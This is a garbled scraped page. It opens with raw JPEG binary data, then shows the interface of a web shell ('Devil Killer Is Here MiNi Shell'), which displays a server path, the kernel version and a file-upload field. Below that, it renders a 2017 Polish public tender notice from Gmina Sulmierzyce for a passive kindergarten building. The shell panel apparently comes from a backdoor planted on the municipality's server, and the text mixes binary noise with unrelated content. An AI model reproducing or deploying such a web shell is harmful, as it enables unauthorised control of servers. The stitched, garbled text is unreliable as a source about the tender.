JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170428/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170428/76058-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.sulmierzyce.biuletyn.net/' target='_blank'>http://www.sulmierzyce.biuletyn.net/</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 76058 - 2017
              z dnia 2017-04-28 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Sulmierzyce: Budowa pasywnego budynku przedszkola w
miejscowości Sulmierzyce na dz.ew.1226/1 obręb 17 Sulmierzyce<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                tak
              </div><br /><b>Nazwa projektu lub programu</b><br />Projekt jest współfinansowany ze środków Unii Europejskiej w ramach Regionalnego Programu Operacyjnego Województwa Łódzkiego na lata 2014-2020 Oś priorytetowa IV Gospodarka niskoemisyjna Działanie IV.3 Ochrona powietrza Poddziałanie IV.3.2 Ochrona powietrza.</div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Sulmierzyce, krajowy numer identyfikacyjny
              59064818400000, ul.
              ul. Urzędowa 
              1,
              98338  
              Sulmierzyce, woj.
              łódzkie, państwo
              Polska, tel.
              446 846 056, e-mail
              sulmierzyce@gminyrp.pl, faks
              446 846 057.
              <br />
              Adres strony internetowej (URL): http://www.sulmierzyce.biuletyn.net/<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />http://www.sulmierzyce.biuletyn.net/</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />http://www.sulmierzyce.biuletyn.net/</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Ofertę należy złożyć w formie pisemnej w Sekretariacie Urzędu Gminy Sulmierzyce<br />
                Adres:
                <br />98-338 Sulmierzyce ul. Urzędowa 1</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Budowa pasywnego budynku przedszkola w
miejscowości Sulmierzyce na dz.ew.1226/1 obręb 17 Sulmierzyce<br /><b>Numer referencyjny: </b>IZP.271.1.5.2017.AS<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>3.1)
Przedmiotem zamówienia jest zaprojektowanie oraz budowa pasywnego budynku przedszkola w miejscowości
Sulmierzyce na dz.ew.1226/1 obręb 17 Sulmierzyce wraz z zagospodarowaniem terenu, na który składa się
budowa placu zabaw, miejsc postojowych, terenów utwardzonych, zjazdu publicznego, wyposażeniem budynku
oraz wykonaniem nasadzeń zieleni niskiej i średniowysokiej. Część 1 zamówienia: Przedmiotem zamówienia jest
zaprojektowanie oraz budowa pasywnego budynku przedszkola w miejscowości Sulmierzyce na dz.ew.1226/1
obręb 17 Sulmierzyce wraz z zagospodarowaniem terenu, na który składa się budowa placu zabaw, miejsc
postojowych, terenów utwardzonych i zjazdu publicznego oraz wyposażeniem budynku zgodnie z wymaganiami
określonymi w Programie funkcjonalno  użytkowym (dalej PFU). Zamawiający zastrzega, iż Wykonawca
związany jest koncepcją architektoniczną budynku przedstawioną w PFU. Zakres zamówienia obejmuje w
szczególności:  Opracowanie projektu budowlanego oraz projektu robót geologicznych,  Uzyskanie
niezbędnych warunków, opinii, pozwoleń, uzgodnień i zatwierdzeń opracowanej dokumentacji,  Uzyskanie
pozwolenia na budowę,  Opracowanie projektów wykonawczych w zakresie niezbędnym do wykonania robót
budowlanych,  Wykonanie robót budowlanych na podstawie opracowanych projektów,  Zgłoszenie
zakończenia robót i uzyskanie pozwolenia na użytkowanie,  Wyposażenie budynku i terenu w zakresie
elementów stałych (Zamawiający uznaje za wyposażenie stałe wszelkie wyposażenie opisane w PFU). Zamawiający wymaga od Wykonawcy uwzględnienia na etapie opracowywania projektów stosowania
wytycznych wynikających w szczególności z poniższych publikacji:  Realizacja zasady równości szans i
niedyskryminacji, w tym dostępności dla osób z niepełnosprawnościami - Poradnik dla realizatorów projektów i
instytucji systemu wdrażania funduszy europejskich 2014-2020 .  Wytyczne w zakresie realizacji zasady równości szans i niedyskryminacji, w tym dostępności dla osób z niepełnosprawnościami oraz zasady równości
szans kobiet i mężczyzn w ramach funduszy unijnych na lata 2014-2020  Minister Infrastruktury i Rozwoju 
maj 2015.  Przepisy prawa budowlanego - Art. 5 1. Obiekt budowlany wraz ze związanymi z nim urządzeniami
budowlanymi należy, biorąc pod uwagę przewidywany okres użytkowania, projektować i budować w sposób
określony w przepisach, w tym techniczno-budowlanych, oraz zgodnie z zasadami wiedzy technicznej,
zapewniając: 4) niezbędne warunki do korzystania z obiektów użyteczności publicznej i mieszkaniowego
budownictwa wielorodzinnego przez osoby niepełnosprawne, w szczególności poruszające się na wózkach
inwalidzkich; Przed rozpoczęciem robót Wykonawca zobowiązany jest:  ogrodzić plac budowy,  oznakować
teren budowy (tablice informacyjne, ostrzegawcze),  powiadomić właścicieli działek sąsiednich i ewentualne
osoby przebywające na działkach sąsiednich o prowadzonych robotach, Wykonawca w ramach niniejszego
zamówienia zobowiązany jest wykonać wszystkie prace, które należy zrealizować w formule zaprojektuj i
wybuduj, zgodnie z zasadami wiedzy technicznej i sztuki budowlanej, obowiązującymi przepisami i normami,
przy dołożeniu należytej staranności, by przedmiot, którego zakres został określony w programie funkcjonalnoużytkowym
oraz specyfikacji istotnych warunków zamówienia, osiągnął gotowość do użytkowania. Ryczałtowe
wynagrodzenie za wykonanie przedmiotu niniejszego zamówienia obejmuje kompleksowe wykonanie
przedmiotu zamówienia określonego powyżej (w tym również wykonanie robót budowlanych nie ujętych w
programie funkcjonalno-użytkowym, a niezbędnych do wykonania za względu na wiedzę techniczną), jak
również wszelkich robót i czynności limitujących odbiór końcowy przedmiotu zamówienia niezależnie od tego,
czy były one przewidziane przez Wykonawcę na dzień złożenia oferty. Wynagrodzenie to obejmuje również zorganizowanie we własnym zakresie poboru mediów oraz ponoszenie kosztów ich zużycia w okresie realizacji
zamówienia. Prace wymagane przez Zamawiającego, a nieobjęte PFU: 1) Opracowanie audytu energetycznego
budynku, 2) Wykonanie świadectwa charakterystyki energetycznej budynku, 3) Wykonanie instrukcji
bezpieczeństwa pożarowego budynku, 4) Wykonanie pełnej obsługi geodezyjnej inwestycji, 5) Wykonanie
dokumentacji odbiorowej w dwóch egzemplarzach w języku polskim z podziałem na branże (oprawionej w
segregatory z szczegółowym spisem treści) zawierającej co najmniej: a) pozwolenie na użytkowanie/zgłoszenie
do użytkowania do PINB przyjęte bez sprzeciwu, b) oryginał/kserokopię dziennika budowy, c) mapy geodezyjne
powykonawcze z pieczątkami potwierdzającymi wniesienie do zasobu geodezyjnego przez Ośrodek
Dokumentacji Kartograficznej i Geodezyjnej, d) oryginał pisemnego oświadczenia Kierownika Budowy:  o
wykonaniu robót zgodnie z projektem budowlanym, ostateczną decyzją Pozwolenia na budowę oraz ustawą
Prawo budowlane,  o doprowadzeniu do należytego stanu i porządku Terenu budowy, a także dróg, ulic,
sąsiednich nieruchomości, budynków i/lub lokali,  o odpowiednim zagospodarowaniu Terenów przyległych do
budowy umożliwiającym właściwą eksploatację wybudowanego obiektu. e) zestawienie wbudowanych
materiałów wraz z dokumentami potwierdzającymi dopuszczenie ich do stosowania na terenie Rzeczpospolitej
Polskiej, f) oryginał/kopię projektu budowlanego powykonawczego - podpisanego przez Kierownika Budowy/Kierowników Robót, g) wykaz zmian istotnych (jeżeli miały miejsce) z załącznikiem graficznym,
podpisany przez Kierownika Budowy, Kierownika Robót odpowiedniego do charakterystyki branży, której
dotyczy zmiana, Inspektora Nadzoru, Projektanta, wraz z dokumentami potwierdzającymi prawidłową legalizację
tych zmian, h) protokoły z badań wykonanych w trakcie realizacji prac budowlanych, i) wersję elektroniczną (w
ilości zgodnej z wersją papierową) dokumentów odbiorowych oraz dokumentacji powykonawczej
(inwentaryzacja w formacie pdf.) na płycie CD/DVD, j) Instrukcję użytkowania i eksploatacji obiektu wraz z
wykazem wbudowanych urządzeń, które wymagają przeglądów serwisowych, k) wszelkie instrukcje obsługi oraz
DTR urządzeń (w języku polskim), wraz z potwierdzeniem wykonania szkoleń w zakresie obsługi tych urządzeń.
Uwaga: Tam, gdzie Zamawiający opisał przedmiot zamówienia przez odniesienie do norm, europejskich ocen
technicznych, aprobat, specyfikacji technicznych i systemów referencji technicznych, o których mowa wart. 30
ust. 1 pkt 2 i ust. 3 ustawy Pzp, Zamawiający wskazuje, że dopuszcza rozwiązania równoważne opisywanym, a
odniesieniu takiemu towarzyszą wyrazy lub równoważne. Wykonawca, który powołuje się na rozwiązania
równoważne opisywanym przez Zamawiającego, jest obowiązany wykazać, że oferowane przez niego dostawy,
usługi lub roboty budowlane spełniają wymagania określone przez Zamawiającego. Część 2 zamówienia:
Przedmiotem zamówienia jest opracowanie projektu wykonawczego nasadzeń, wykonanie nasadzeń zieleni
niskiej i średniowysokiej oraz założenie trawników przy nowopowstałym pasywnym budynku przedszkola w
miejscowości Sulmierzyce na dz.ew.1226/1 obręb 17 zgodnie z koncepcją zieleni oraz spisem nasadzeń, a także
utrzymanie wykonanych nasadzeń przez okres 1 roku od podpisania protokołu odbioru końcowego wykonanych
nasadzeń. Utrzymanie wykonanych nasadzeń polegać będzie na przeszkoleniu wskazanego personelu Zamawiającego, pielęgnacji nasadzeń z częstotliwością minimum raz na kwartał oraz wykonaniu nowych
nasadzeń w przypadku gdy wykonane nasadzenia uległy zniszczeniu z przyczyn naturalnych. Szczegółowy opis
przedmiotu dla Części 1 i Części 2 zamówienia został zawarty w Rozdziale V SIWZ, na który składają się
następujące dokumenty: 1) Program funkcjonalno - użytkowy 2) Audyt energetyczny 3) Decyzje, uzgodnienia,
którymi dysponuje Zamawiający 4) Koncepcja zieleni oraz spis nasadzeń 3.2) Zamawiający informuje, iż zgodnie
z art. 29 ust. 3a ustawy Pzp wymaga, aby wszystkie czynności składające się na wykonanie Robót lub usług i
związane z wykonaniem tych Robót lub usług dla, których jest konieczna obecność osoby je wykonującej na
Terenie budowy były wykonywane w oparciu o osby zatrudnione na umowę o pracę w rozumieniu art. 22 § 1
ustawy z dnia 26 czerwca 1974 r. - Kodeks pracy (Dz. U. z 2016 r. poz. 1666 ze zm.). Osoby wymienione w
zdaniu pierwszym nie mogą wykonywać żadnych czynności na Terenie budowy bez zatrudnienia na umowę o
pracę u Wykonawcy, Podwykonawców Robót lub usług. Wymaganie nie dotyczy Projektantów, Geodety,
Kierownika budowy oraz Kierowników Robót branżowych, jeżeli Wykonawca udowodni, iż osoba powołana do
pełnienia tej funkcji była związana przed zawarciem niniejszej Umowy z Wykonawcą inną formą zatrudnienia np.
wieloletnim kontraktem lub prowadzi działalność gospodarczą obejmującą pełnienie tej funkcji i będzie pełnić tę
funkcję osobiście. Szczegółowe wymagania dot. zatrudnienia na podstawie umowy o pracę zawarte zostały w Rozdziale IV SIWZ  Projekt umowy.<br /><br /><b>II.5) Główny kod CPV: </b>45000000-7<br /><b> Dodatkowe kody CPV:</b>71320000-7,
                77310000-6<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 24/08/2018<br /></div><div style="padding-left: 20px">
                    data zakończenia: 09/07/2019<br /></div><br /><b>II.9) Informacje dodatkowe: </b>Termin wykonania zamówienia Część 1 zamówienia  od zawarcia umowy do
dnia 24 sierpnia 2018r, w tym: 1) Etap projektowania - opracowanie projektu budowlanego wraz z uzyskaniem
prawomocnego Pozwolenia na budowę do 4 miesięcy od daty podpisania Umowy, 2) Etap wykonania Robót -
rozpoczęcie Robót  10 dni po uprawomocnieniu się decyzji Pozwolenia na budowę do 30 maja 2018r., 3) Etap
odbioru końcowego Robót i odbioru Przedmiotu Umowy oraz przekazania do użytkowania w terminie do 24
sierpnia 2018r. Część 2 zamówienia  od zawarcia umowy do dnia 9 lipca 2019r, w tym: 1) Etap projektowania -
opracowanie projektu wykonawczego nasadzeń do 2 miesięcy od daty przekazania przez Zamawiającego
projektu budowlanego, 2) Etap wykonania - rozpoczęcie 10 dni po podpisaniu przez Zamawiającego protokołu
odbioru Robót budowlanych dla Części 1 zamówienia, zakończenie  1 miesiąc od rozpoczęcia, 3) Etap
utrzymania nasadzeń - 1 rok od podpisania protokołu odbioru końcowego wykonanych nasadzeń.</div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego
warunku.<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Część 1 zamówienia: Zamawiający stawia szczegółowe minimalne wymagania w
zakresie oceny tych zdolności. O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy wykażą
minimalne poziomy zdolności w zakresie sytuacji finansowej tj. Wykonawcy, którzy posiadają środki
finansowe lub zdolność kredytową w kwocie nie mniejszej niż 2.000.000,00 zł (słownie: dwa miliony złotych
00/100). Uwaga: Wartości podane w walutach innych niż wskazane przez Zamawiającego wykonawca
przeliczy wg średniego kursu NBP na dzień wystawienia dokumentu. Wykonawca potwierdza spełnianie
warunku w pierwszej kolejności poprzez złożenie wraz z ofertą Oświadczenia własnego, o którym mowa w
pkt. 7.1 SIWZ. Część 2 zamówienia: Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania
tego warunku.<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Część 1 zamówienia: Zamawiający stawia szczegółowe wymagania w zakresie oceny
tych zdolności tj. o udzielenie zamówienia może ubiegać się wykonawca, który wykaże minimalne poziomy
zdolności w zakresie posiadanej wiedzy i doświadczenia oraz w zakresie osób, które zostaną skierowane
przez wykonawcę do realizacji zamówienia tj. który wykaże, iż: a) w okresie ostatnich 5 lat przed upływem
terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie wykonał co
najmniej jedno zadanie obejmujące zaprojektowanie i budowę pasywnego budynku o kubaturze powyżej 5
tys m3, zasilanego energią pochodzącą z pomp ciepła, a wartość tego zadania wynosiła minimum
6.000.000,00 zł brutto, b) dysponuje osobą posiadającą doświadczenie nabyte w okresie ostatnich dwóch lat
przed upływem terminu składania ofert w postaci opracowania projektu geologicznego odwiertów pod
pompy ciepła o mocy min. 60 000 W, a) dysponuje osobą, która pełnić będzie funkcję projektanta branży
konstrukcyjno - budowlanej posiadającą:  uprawnienia do projektowania w specjalności konstrukcyjno -
budowlanej bez ograniczeń określone przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z
2016r., poz. 290 ze zm.) i rozporządzenia Ministra Infrastruktury i Rozwoju z dnia 11 września 2014 r. w
sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2014 r. poz. 1278) lub odpowiadające
im zakresem uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów, 
doświadczenie nabyte w okresie ostatnich dwóch lat przed upływem terminu składania ofert w postaci
wykonania projektu minimum jednego pasywnego budynku przedszkola lub szkoły o kubaturze powyżej 5
tys m3 b) dysponuje osobą, która pełnić będzie funkcję projektanta branży sanitarnej posiadającą: uprawnienia do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń określone przepisami ustawy z
dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2016r., poz. 290 ze zm.) i rozporządzenia Ministra
Infrastruktury i Rozwoju z dnia 11 września 2014 r. w sprawie samodzielnych funkcji technicznych w
budownictwie (Dz. U. z 2014 r. poz. 1278) lub odpowiadające im zakresem uprawnienia, które zostały
wydane na podstawie wcześniej obowiązujących przepisów,  doświadczenie nabyte w okresie ostatnich
dwóch lat przed upływem terminu składania ofert w postaci wykonania co najmniej projektu instalacji i
urządzeń cieplnych, dla minimum jednego pasywnego budynku przedszkola lub szkoły o kubaturze powyżej
5 tys m3 c) dysponują osobą, która pełnić będzie funkcję projektanta branży elektrycznej posiadającą: 
uprawnienia do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń
elektrycznych i elektroenergetycznych bez ograniczeń określone przepisami ustawy z dnia 7 lipca 1994 r.
Prawo budowlane (Dz. U. z 2016r., poz. 290 ze zm.) i rozporządzenia Ministra Infrastruktury i Rozwoju z
dnia 11 września 2014 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2014 r.
poz. 1278) lub odpowiadające im zakresem uprawnienia, które zostały wydane na podstawie wcześniej
obowiązujących przepisów,  doświadczenie nabyte w okresie ostatnich dwóch lat przed upływem terminu
składania ofert w postaci wykonania projektu instalacji elektrycznych dla minimum jednego pasywnego
budynku przedszkola lub szkoły o kubaturze powyżej 5 tys m3  doświadczenie nabyte w okresie ostatnich
dwóch lat przed upływem terminu składania ofert w postaci wykonania projektu instalacji fotowoltaicznej o
mocy min. 50kW zlokalizowanej na dachu budynku, d) dysponują osobą, która pełnić będzie funkcję projektanta branży telekomunikacyjnej posiadającą uprawnienia do projektowania w specjalności
instalacyjnej w zakresie sieci, instalacji i urządzeń telekomunikacyjnych bez ograniczeń określone przepisami
ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2016r., poz. 290 ze zm.) i rozporządzenia Ministra
Infrastruktury i Rozwoju z dnia 11 września 2014 r. w sprawie samodzielnych funkcji technicznych w
budownictwie (Dz. U. z 2014 r. poz. 1278) lub odpowiadające im zakresem uprawnienia, które zostały
wydane na podstawie wcześniej obowiązujących przepisów, e) dysponują osobą, która pełnić będzie funkcję
kierownika budowy posiadającą:  uprawnienia do kierowania robotami budowlanymi w specjalności
konstrukcyjno - budowlanej bez ograniczeń określone przepisami ustawy z dnia 7 lipca 1994 r. Prawo
budowlane (Dz. U. z 2016r., poz. 290 ze zm.) i rozporządzenia Ministra Infrastruktury i Rozwoju z dnia 11
września 2014 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2014 r. poz.
